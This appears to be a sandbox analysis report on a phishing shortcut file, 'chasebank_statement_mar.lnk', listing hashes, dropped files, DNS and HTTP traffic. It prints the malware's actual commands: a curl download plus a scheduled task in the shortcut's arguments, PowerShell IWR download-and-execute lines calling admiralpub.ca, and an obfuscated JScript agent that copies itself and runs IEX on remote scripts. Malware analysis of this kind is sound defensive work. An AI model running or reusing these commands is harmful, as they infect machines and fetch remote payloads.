                  SHA-256:34C5E1424B9B6E6C54A247B9794BFC465F34117B3A57AF74E13B8CEC0A9C8A84
                  SHA-512:0F2A022520D9C1FFDDFCA2A9F3E6F3B11DB0286474F2D124C3319D73E09D2EA5BC2479090F5820CDF3BF66A08BB102BB064F6DF5E50797CC2D2990235E26E069
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:var f1="Scr",f2="ing.Fi",f3="stemOb"..var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");..var w1="WSc",w2="riPt",w4="eLl"..var wsh=w1+w2+".sH"+w4..var bbj=new ActiveXObject(wsh)..var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32"..var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe"..if (WScript.ScriptName != "agent.js") {...var fs5="yFi"...try {...fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\agent.js");...} catch (e) {}..}..var mtx_name="7zIDTSVL44SX";..var mtx_file = bbj.ExpandEnvironmentStrings("%temp%")+"\\"+mtx_name;..var fs1="leteFi"..var fs2="leExis"..try {...fso["De"+fs1+"le"](mtx_file);..} catch (e) {}..if (!fso["Fi"+fs2+"ts"](mtx_file))..{...bbj.Run(rd+" -command \"$env:paths = '" + mtx_name + "'; IEX(IWR -UseBasicParsing 'https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1'); $f.SetValue($null, $true); IEX(IWR
                  Process:C:\Windows\System32\curl.exe
                  File Type:ASCII text, with no line terminators
                  Category:modified
                  Size (bytes):197
                  Entropy (8bit):5.149953539643581
                  Encrypted:false
                  SSDEEP:6:rz8GiyaAU1alAZIK8nKJIKy9N8CVu5gR6vN8H:X8BJx15xkjB805R7H
                  MD5:0332390C6D942762863689302B78C59A
                  SHA1:87B6E8A839BFF7A02D2B190999191557C6FA9B61
                  SHA-256:B119B68F050C3A5DDFC8D1B7F704BD57E8B6520FA2E04918BC6DCE7ED74E855F
                  SHA-512:34AD0899591ABFD812D950E586112B6DCF687371831834A13A6F03CFD38FEAEACE6E3322C772965E8B2D927E3DFB596324C08CF8967E47E88FF9B5ABF8C75543
                  Malicious:true
                  Preview:start /min powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf '%tmp%\EGLG6DJOY9K9.js'; schtasks /delete /tn %1 /f; wscript %tmp%\EGLG6DJOY9K9.js"
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.7086549122235817
                  Encrypted:false
                  SSDEEP:96:SHsnCzjjkvhkvCCt2fHXXRnHpfHXXRnHK:SHsMz2fHXjfHX4
                  MD5:5CF3978A67773AC7FF3D2857CD66A58C
                  SHA1:19121A71FEC52032536CE01B34783DF54DAC6449
                  SHA-256:E6B0595B5E8C356DA13257D1C8CE405FDC03E9285DAF836464E918A66D5EF9B2
                  SHA-512:F38E5C3BA16A858F85131BA5D3788664D3FE2FBA7ABC34AB693E4784EE1A62A1F674C29D9453CCA8BA30D79F6EDC3411EE2E95333DE29F535FC968204308F9CC
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......O...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2...."./3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl|Xv.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.7082869541964114
                  Encrypted:false
                  SSDEEP:96:S2snCzjjkvhkvCCt2fHXXRnHpfHXXRnHK:S2sMz2fHXjfHX4
                  MD5:CC015BD28884D62945E86E4A9026384C
                  SHA1:3A9C5782B2EABC39A01A046696243CB31FCC2A9B
                  SHA-256:10CE18C3597DCAB6BAF12719CACC926BD1743F0DC544E57CFB54EF9ABD4B7D77
                  SHA-512:0D4570EACE6FCEE836865E6BA3B2BC6703BBE091024EC2DD59449002AA046A1F396B5BCDC0A3F422D6B597A058C90A397C5CBE9298FC07B2B2427BFE98E45F79
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......O...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2...._..3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl|Xv.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Process:C:\Windows\System32\curl.exe
                  File Type:ASCII text, with CR, LF line terminators
                  Category:dropped
                  Size (bytes):399
                  Entropy (8bit):3.053345478600629
                  Encrypted:false
                  SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcIZCooSgOgOT:Vz6ykymUexb1U9cL9cIZCD9G
                  MD5:8F756A184F35A22876E005A67091AD01
                  SHA1:C161992CEE76EF3C35F471BD4AC0DB8399F6285B
                  SHA-256:908C219EF79F1D31ED64700F94EEEE7321D2301E6B96D27A62819A128E2D13F3
                  SHA-512:DAD8E225CE900EFFC203EB78CCACE2206C74C0028707E6C0B38211C162390017E489070351912E67F45718D99E799A9913B224755B79546AF706C85DED382642
                  Malicious:false
                  Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 197 0 197 0 0 276 0 --:--:-- --:--:-- --:--:-- 276..
                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Wed Oct 6 12:52:37 2021, mtime=Wed Mar 27 01:07:39 2024, atime=Wed Oct 6 12:52:37 2021, length=289792, window=hidenormalshowminimized
                  Entropy (8bit):2.9313220021387747
                  TrID:
                  • Windows Shortcut (20020/1) 100.00%
                  File name:chasebank_statement_mar.lnk
                  File size:3'017 bytes
                  MD5:2ac1bf6ce61112134a087ce30d48cd6b
                  SHA1:3b78b7507e4a1fe63ce51a5a2b19de8487b199f1
                  SHA256:b54eb35a701e5bba8f1df00f4e21e2bd4637ce3ce490560d203feab0dc84ff06
                  SHA512:954dbf6d915fc68d399472f840d89c978fdc6a58b5406ccc694b4b97f123298bc4a05ab119ccb539d7d2ce7c535543ed7974617bdabba7b5417777690ba179bd
                  SSDEEP:24:8a6JlQx64fAA2P0+/o4Jq2BsB5NgKcgv8/dd+IAI0OXuHY8tXmH:8fWoD80qfBJY/dkIPXuHx8
                  TLSH:5151D0243FED0B30D3F6497614B6A621857B799AE975DB1C00D4868C4826E10AC39F7F
                  File Content Preview:L..................F.B.. ...Pu.l......i.....Pu.l.....l......................5....P.O. .:i.....+00.../C:\...................V.1.....iW.b..Windows.@........OwH{X......&.....................lf6.W.i.n.d.o.w.s.....Z.1.....zXMT..System32..B........OwH{X........
                  Icon Hash:74f4f4dcece9e9ed

                  General

                  Relative Path:..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
                  Command Line Argument:/c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'%tmp%\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                  Mar 28, 2024 18:11:41.935695887 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:41.935730934 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:41.935801983 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:41.946871042 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:41.946887970 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.304347992 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.304418087 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:42.306945086 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:42.306953907 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.307199001 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.310619116 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:42.352238894 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.493614912 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.502674103 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:42.502734900 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:42.510524988 CET  49706        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:42.510538101 CET  443          49706      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.156785011 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.156812906 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.156878948 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.167570114 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.167582989 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.395399094 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.395468950 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.398211956 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.398221016 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.398453951 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.405333996 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.452244043 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.726317883 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.734868050 CET  443          49707      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:11:47.735117912 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:11:47.758186102 CET  49707        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.665699005 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.665724039 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:03.665791988 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.669879913 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.669891119 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:03.898551941 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:03.898633003 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.903228998 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.903237104 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:03.903469086 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:03.909478903 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:03.952243090 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:04.228037119 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:04.235511065 CET  443          49716      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:12:04.235578060 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:12:04.245589018 CET  49716        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.670890093 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.670924902 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:02.670981884 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.674324036 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.674338102 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:02.902317047 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:02.902373075 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.906233072 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.906239986 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:02.906481028 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:02.917754889 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:02.960232973 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:03.245589018 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:03.253700018 CET  443          49719      103.26.141.28  192.168.2.5
                  Mar 28, 2024 18:13:03.257800102 CET  49719        443        192.168.2.5    103.26.141.28
                  Mar 28, 2024 18:13:03.261204004 CET  49719        443        192.168.2.5    103.26.141.28
                  Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                  Mar 28, 2024 18:11:41.800190926 CET  52256        53         192.168.2.5  1.1.1.1
                  Mar 28, 2024 18:11:41.930814981 CET  53           52256      1.1.1.1      192.168.2.5
                  Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
                  Mar 28, 2024 18:11:41.800190926 CET  192.168.2.5  1.1.1.1  0x4648    Standard query (0)  admiralpub.ca  A (IP address)  IN (0x0001)  false
                  Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
                  Mar 28, 2024 18:11:41.930814981 CET  1.1.1.1    192.168.2.5  0x4648    No error (0)  admiralpub.ca         103.26.141.28  A (IP address)  IN (0x0001)  false
                  • admiralpub.ca
                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  0           192.168.2.5  49706        103.26.141.28   443               6024  C:\Windows\System32\curl.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2024-03-28 17:11:42 UTC  115                OUT        GET /wp-content/uploads/2017/olympiadic.php HTTP/1.1
                  Host: admiralpub.ca
                  User-Agent: curl/7.83.1
                  Accept: */*
                  2024-03-28 17:11:42 UTC  208                IN         HTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:11:42 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:11:42 UTC  203                IN         Data Raw: 63 35 0d 0a 73 74 61 72 74 20 2f 6d 69 6e 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 20 22 49 57 52 20 2d 75 73 65 62 20 27 68 74 74 70 73 3a 2f 2f 61 64 6d 69 72 61 6c 70 75 62 2e 63 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 6f 6c 69 67 6f 70 68 6f 73 70 68 61 74 75 72 69 61 2e 70 68 70 27 20 2d 6f 75 74 66 20 27 25 74 6d 70 25 5c 45 47 4c 47 36 44 4a 4f 59 39 4b 39 2e 6a 73 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 25 31 20 2f 66 3b 20 77 73 63 72 69 70 74 20 25 74 6d 70 25 5c 45 47 4c 47 36 44 4a 4f 59 39 4b 39 2e 6a 73 22 0d 0a
                  Data Ascii (chunk size line, then the chunk body, line breaks restored from the 0d 0a bytes above):
                  c5
                  start /min powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf '%tmp%\EGLG6DJOY9K9.js'; schtasks /delete /tn %1 /f; wscript %tmp%\EGLG6DJOY9K9.js"
                  2024-03-28 17:11:42 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  1           192.168.2.5  49707        103.26.141.28   443               5668  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2024-03-28 17:11:47 UTC  203                OUT        GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1
